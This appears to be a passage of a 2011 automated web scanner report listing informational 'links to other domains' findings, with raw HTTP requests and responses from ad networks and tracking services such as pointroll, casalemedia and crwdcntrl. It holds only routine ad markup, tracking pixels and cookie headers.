Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2EouvAb7yDAEECAeJozEovALEa7O!E7BCeJpJEotn9OvPEAzwCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=01A30400-3C8E-EBF0-0209-713000040200; PRca=|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 13:32:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1805
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=14A30400-7F37-1D96-1209-989000080200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKNx*1039:1|AKDn*23939:2|AKLC*1774:2|AKTy*9203:2|AKRD*2017:4|AKQh*130:3|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:16|AKPE*832:3|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKNxAAQl:1|AKDnAGOH:2|AKPEAADS:1|AKRDAJme:3|AKLCAA2c:2|AKTyACY1:2|AKRDAA67:1|AKQhAACG:3|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:5|AKVYAACD:1|AKQkAFx5:4|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FOGh:1|FVpf:2|FYnn:1|FOO8:1|FZt1:1|FZt2:1|FZt3:1|FWcM:1|FW9q:2|FW9n:2|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:3|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GJX7:1|GLBY:2|GK5Q:1|GJTu:1|GMjA:1|GMSn:1|GKwo:2|GLLp:2|GMjB:2|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:7|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FOGhGJX7:1|FVpfGLBY:2|FYnnGK5Q:1|FOO8GJTu:1|FZt1GMjB:1|FZt2GMjA:1|FZt3GMSn:1|FWcMGLLp:1|FW9qGLZC:2|FW9nGLZC:2|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:3|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ads.undertone.com/c?oaparams=2__bannerid=191502__campaignid=31210__zoneid=15137__UTLCA=1__cb=8dbd1f42d1bf401eaacad663ab76a557__bk=ll347b__id=5jwh0duijqd7vngjkwzq6zqds__oadest=http://clk.pointroll.com/bc/?a=1466023&c=1&i=14A30400-7F37-1D96-1209-989000080200&clickurl=http://www.woodmaster.com/email_flexfuel/'><img border=0 width='728' height='90' style='width:728px;height:90px' src='http://speed.pointroll.com/PointRoll/Media/Banners/NorthwestManufacturing/857429/FlexFuel_728x90.jpg?PRAd=1466023&PRCID=146602
...[SNIP]...
13.23. http://adserving2.cpxinteractive.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.examiner.com/fight-sports-in-national/complete-wwe-smackdown-spoilers-for-friday-may-13th-new-face-and-new-feuds
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:32:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:32:25 GMT
Content-Length: 658

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.examiner.com/fight-sports-in-
...[SNIP]...
<noscript><a href="http://ad.yieldmanager.com/imageclick?Z=300x250&s=1588565&t=2" target="parent"><img border="0" src="http://ad.yieldmanager.com/imp?Z=300x250&s=1588565&t=2"></img>
...[SNIP]...
13.24. http://arstechnica.com/public/shared/scripts/ad-loader-frame.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://arstechnica.com
Path:   /public/shared/scripts/ad-loader-frame.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /public/shared/scripts/ad-loader-frame.html?req=http://ad.doubleclick.net/adj/ars.dart/ce_gear;abr=!webtv;mtfIFPath=/mt-static/plugins/ArsTheme/ad-campaigns/doubleclick/;tile=2;sz=300x250;kw=top;kw=more-chromebooks-from-google-chrome-os-web-store-updates-too;kw=05;kw=2011;kw=news;kw=gadgets;ord=78259950971696530 HTTP/1.1
Host: arstechnica.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199748606.1305051745.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=199748606.420037276.1305051745.1305051745.1305051745.1; phpbb3_5qbzr_u=1; phpbb3_5qbzr_k=; phpbb3_5qbzr_sid=15183fa6ce53f5ab42a35606030e6bc4

Response

HTTP/1.1 200 OK
X-ID: .13/vm3
Vary: Accept-Encoding
Content-Type: text/html
ETag: "757018977"
Last-Modified: Wed, 11 May 2011 20:14:45 GMT
Content-Length: 1831
Server: Joost NRG/0.0.1
X-Powered-By: Rainbows and unicorns
Date: Thu, 12 May 2011 13:27:53 GMT
X-Varnish: 999515623 998541438
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.crwdcntrl.net/4/to=y%7Cp=1686%7Cout=json%7Cvar=ccauds"></script>
...[SNIP]...
13.25. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=114014&u=http%3A%2F%2Fcdn-bpx.a9.com%2Famzn%2Fiframe.html&a=4&id=81951206&p=10&v=2&inif=1&l=0&t=0&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://cdn-bpx.a9.com/amzn/iframe.html?p=281;last=1094;r=a834682
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMSC=Tcvg+Q**; CMD2=AAE5NU3L4PkAAduQAAMEtQEDAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMS=107527&1305207085&98198&-1; CMST=Tcvg+U3L4S0C; CMDD=AAGkBwEAAduQAQ**; CMD1=AADz3E3L4S0AAaQHAAMfUwECAA**

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:33:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:33:47 GMT
Content-Length: 252
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:33:47 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:47 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:33:47 GMT
Set-Cookie: CMST=Tcvg+U3L4bsD;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:47 GMT
Set-Cookie: CMDD=AAFnSAIAAaQHAQAB25ABfad4e1a9f1208c3c0784AAAAf10*;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:33:47 GMT
Set-Cookie: CMD4=AAFKA03L4UAAAb1eAANamQEBAAABJ6tNy+G7AAG9XgADNYEBAQA*;domain=casalemedia.com;path=/;expires=Sat, 11 Jun 2011 13:33:47 GMT

document.write('<iframe src="http://view.atdmt.com/CNT/iview/286382387/direct;wi.300;hi.250/01/0797372340?click=http://c.casalemedia.com/c/4/1/75691/" width="300" height="250" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>
...[SNIP]...
13.26. http://as.casalemedia.com/j  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.casalemedia.com
Path:   /j

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /j?s=121744&u=http%3A%2F%2Fwww.greenfieldreporter.com%2Fview%2Fstory%2F0a19804652d4473789a5eda53a1ed37f%2FUS-Investing-Unlucky-Seven%2F&a=2&id=63715474&p=10&v=2&inif=0&l=44&t=129&w=1920&h=1156&z=300 HTTP/1.1
Host: as.casalemedia.com
Proxy-Connection: keep-alive
Referer: http://www.greenfieldreporter.com/view/story/0a19804652d4473789a5eda53a1ed37f/US-Investing-Unlucky-Seven/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMJ2=AAJzHU2y+SIB; CMD3=AAFJfU3EWdoAAda-AAMwuwECAA**; CMS=98198&-1&115183&1305033095; CMD1=AADz3E3JOYcAAcHvAANYqQEBAA**; CMID=5w153q3LtckAAEY.ZOUAAAAB; CMPS=061; CMPP=006; CMD2=AAFKkU3IB7EAAduQAAM1pAEBAAABPrtNyAexAAHbkAAC9aIEBAAAATk1TcgHsAAB25AAAwS1AQIAAAFNgk3IB7EAAduQAANH4QcHAAABSf1NyAewAAHbkAADWe4BAQAAAUoDTcgHsAAB25AAA1qaAQEAAAE5fk3JOggAAdd3AALYWAEBAAABTC1NyAhhAAHbkAADQI4FBQAAASyQTcgHsQAB25AAAsYoAQEAAAEuSE3IB7EAAduQAALcQgMDAAABLhhNyAexAAHbkAAC-PAHBwAAAUrTTcgHsQAB25AAA2MUBgYA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/javascript
Expires: Thu, 12 May 2011 13:31:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 13:31:48 GMT
Content-Length: 178
Connection: close
Set-Cookie: CMID=5w153q3LtckAAEY.ZOUAAAAB;domain=casalemedia.com;path=/;expires=Fri, 11 May 2012 13:31:48 GMT
Set-Cookie: CMPS=061;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:31:48 GMT
Set-Cookie: CMPP=006;domain=casalemedia.com;path=/;expires=Wed, 10 Aug 2011 13:31:48 GMT
Set-Cookie: CMST=Tcvg+U3L4UQE;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:31:48 GMT
Set-Cookie: CMSC=TcvhRA**;domain=casalemedia.com;path=/;
Set-Cookie: CMDD=AAHbkAIAAWdIAQABpAcB;domain=casalemedia.com;path=/;expires=Fri, 13 May 2011 13:31:48 GMT
Set-Cookie: CMD2=AAE5NU3L4UQAAduQAAMEtQIEAA**;domain=casalemedia.com;path=/;expires=Sat, 11 Jun 2011 13:31:48 GMT

document.write('<iframe src="http://cdn.optmd.com/V2/80181/197813/index.html" width="728" height="90" marginwidth="0" marginheight="0" frameborder="0" scrolling="no"></iframe>');
13.27. http://badges.del.icio.us/feeds/json/url/data  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://badges.del.icio.us
Path:   /feeds/json/url/data

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /feeds/json/url/data?url=http://crenk.com/buy-chromebook/&callback=displayURL HTTP/1.1
Host: badges.del.icio.us
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 12 May 2011 13:29:25 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://feeds.delicious.com/v2/json/urlinfo/data?url=http://crenk.com/buy-chromebook/&callback=displayURL
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.4
Content-Length: 243

The document has moved <A HREF="http://feeds.delicious.com/v2/json/urlinfo/data?url=http://crenk.com/buy-chromebook/&amp;callback=displayURL">here</A>.<P>
<!-- fe04.feeds.del.ac4.yahoo.net uncompresse
...[SNIP]...
13.28. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /px?Yz00MTYmcHhpZD02MDY4JnB4aWQ9NTQ3JnB4aWQ9NTc3MiZweGlkPTQ2OCZweGlkPTExMzY%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=416%7Crand=357735581%7Cpv=y%7Cint=%23OpR%2311286%23Article%20%3A%20%7Cint=%23OpR%2311373%23Article%20%3A%20%20%3A%20%7Cint=%23OpR%2311668%23Article%20Categories%20%3A%20You%20are%20hereNational%20/%20Sports%20/%20Fight%20Sports%7Cmed=%23OpR%2311667%23Article%20%3A%20Sports%20%3A%20Fight%20Sports%7Casync=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nCWRyytEcRzFvyJp5r7md927sZO9Uv4F5b3zmCkRZTbK24xSs5GFxsZGskBZ2lrYiIVHYqOUpUixUcqOMs7nLu7pnN%2F5vs3M%2Bm%2Bfx8zq2l%2BLIwXLm0Wt9v%2BlvQKrwvoE3oOg%2BaNilRpMCrwnicmMWFgWJG8SM8eCcFViHJLljoBpnBNiTetiuSPexon7pd6s3oJRQWaPgA5Bbldi%2BkK9HUF8SoP3YlmfZF0Ct89EU4JgiHqXiF%2BwAYX7ZdgFceRM18T8H0b5RJzHeY3zBpGJvG0CNrCcYOmmpTZm%2BMZSj%2BWMXjYRWwTRMm8HsBXYIWyJXgLYHJtgIVGJeo8UQnQcrpG9uHexbA8LSehsiwoxR23AWRSLrmCc2C1QaJgATuwWgRKL7MSSp4lzWIE%2BB2u%2FP3x4Tdg%3D; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w%2Fj%2Fj9e%2BpSBgVH%2FSUZENEiMIVjg2242BoazDAz%2FgeKTvqz5z8jAIAnhWf7%2FD%2BQxLgDygIJfgDwGBiYGBq5%2FDKEC3%2FYwA3WBhaDqEAo4%2F4GM3QvUuunXTpAJ%2FxkYBRXz8GsQVDEkZOIVhEOhCqAOhbgQahuSQ4H2CvN34zAWyOAU%2BHaCGWYmmmFAlsC3U3j0yuc14ZEVFCrG752QL1qEFGgTCJCfr%2FE4XpDtL1j7X8x4BcXfzwv4PP7zGl7Zu%2FhkfzWiRLyDRQV%2BbzhYVBLy5wQ8PjH7VMGKN1kgIoVL4OdEvGHSj0%2F2x1wUfznLKnGihwJEEyzfWKxOR2QfRslZ15AcAzYHJAq0kecfw%2FH%2FDCxyhivxBKub9Ro8svIz%2BPDIeu%2FXwyNrrVuARzYQki1xyNq7LcYja84ngs9VwVfxyIaeb8QjG%2FzJGZ%2FesLP4U5S2BtjLwNhCimkIDxjTQSlH8chqa9%2FAJ6vViEc2gtsCT5ER%2FiYTn%2By9m3hklbn%2BssJlsZXiiAAAOoRJ8PtsRFK3BFJgBX8hhjFq7VHFIyvz%2FzRuhwDTSwwevW7W5%2FDolTPcgkdWWM0Sj2xoz0w89vrnn8Sj1%2BvFdXyuapTAY3Kg822UYiHQ%2BR4q38gMlW%2F3GJVvux%2BVr9OEyndqQ%2BXrLkPl66PKOx85hCpv%2BhBV%2FvcCVHlHJzT1aO43vYuq3%2FsrqrxhKypfzwuN743KtyhC848oKt%2BkHZVvcB6NfwmFr5R0AREf%2F4BRwiNrdpEaBXMA7z52EtpFUCcFLmKmhuVc9Q3UMMbn32kcxSRX6yRqWMBX8ZYaxjidfYrDnZyPl1PDAu6EXdQxZic1jJGpU6eGMQBowgth

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:09 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 597

<html><body><div><!-- Segment Pixel - ESPN NBA id 5732 - DO NOT MODIFY -->
<script src="http://ib.adnxs.com/seg?add=119482&t=1" type="text/javascript"></script>
<!-- End of Segment Pixel -->
<img src='http://pc2.yumenetworks.com/dynamic_btx/115_89795' height=1 width=1><iframe src="http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2829&action=1"></iframe>
<img src="http://ads.adbrite.com/adserver/behavioral-data/8203?d=2829" width="1" height="1">
<img src="https://ad.yieldmanager.com/pixel?id=1169816&t=2" width="1" height="1" /></div>
...[SNIP]...
13.29. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /px?Yz0zMTMmcHhpZD01ODE1JnB4aWQ9MTAwMSZweGlkPTUzJnB4aWQ9NDcyJnB4aWQ9NjA0MQ%3D%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=313%7Crand=255852379%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6d4cb6550583e1fdb81b2fe52a3cce9a; aud=ABR4nCWRP0tCYRyFf5FEiPePf%2B5d3PoCQtBXkKDMMcxFEawlCIu6NblIQ9TSEtGiu2tDS%2BSgRuTi1BYUQi1NQkOBcp473Ifzvuec9%2Ffea2ZWeHkfmi3kPuver62b%2BStNa5qFG6bnErUpkRhLZb5BTUi8CcG%2B4J2iJgrEu4J3RvxVCHZlWW7hrJL7R1WoPhDidwq4JYb4EJK3xFex3MiSfhAyI8rylPU5bwvVE1I4nT%2BG%2F5EKG%2Bw9o1qMe43znJZ7Tp8KziKdj0x2wWJW8I8V8E%2FItXF2OM9laq7iR7Kk%2BJBLDkN8CW5ALs2NrkCM6gHOPTABh3Ru03nEYsRka%2Bzt8FeKqLJU8mn%2BmgHa7mAa; cc=ACB4nGNQMEsxSU4yMzU1MLUwTjVMS0myMEwySks1NUo0Tk5OtUxkAALf0w9O%2FH%2B8rJqBgVH%2FSRr%2FD5AYg0fIFy1mBoazDAz%2FgeKWQIqRgeELmMcEFPjHEBzyRRu%2FAkG2vwgFk76sBymQBFJg2VCBb7tZcchiMQyofA9%2B2wS%2B7WVkYNz0aw9QhvE%2FA6OgiiEB5ynm4VfgYFFBwMpfjShWOlhUEnLjFRY0BVDtSOqABgnzd%2BMwCMhgFPh2Co%2BsfF4TPr0%2FJ%2BCJE7NPuHwM0TsRj15BoWICnv%2FZjy85%2FJiLEpbOskocMNUwZRBNsICzWJ0FoiRn3URyJtgAkCjQKqZ%2FDMf%2FM7CEhp0lkBC%2Bz8bja609qnhkA1Vi8MiG37uJRza0ZyYe2QhuC3wmv8nEIyvXKIFHVlv7BkgWOUyRIkJbowCPbFDKUXx6tRrxyCpz%2FcWX4xngbvzHwBRo%2BhA1OfxegMIPdHRC5ZveQ%2BPfRdXv%2FRVV3vk2Gh9Nv2ErKt%2FIDJVv9xiVr%2BeFxvdG5VsUofJt96PydUVR%2BTpNqHynNlS%2BSTua%2FmWofH009Qbn0fiXUMPnyCEUvvZpFdwxCZRVxiMbdgZPCmJUSrrAiBTTjEHVTCDVX5%2BC0wGQQpGNFDPDXWgw%2Buevw2vTShSzIjYH4lEd0SSFz08XPqKYpSzggMddDFyyZhcpKr4CePexEVM7QqMscBEzRdZx1TdQpJ%2Fz8XKK9HMn7KJQ%2F06K9MvUqVMWfq2TKNLPV%2FGWIv0AtwcG3g%3D%3D

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1269

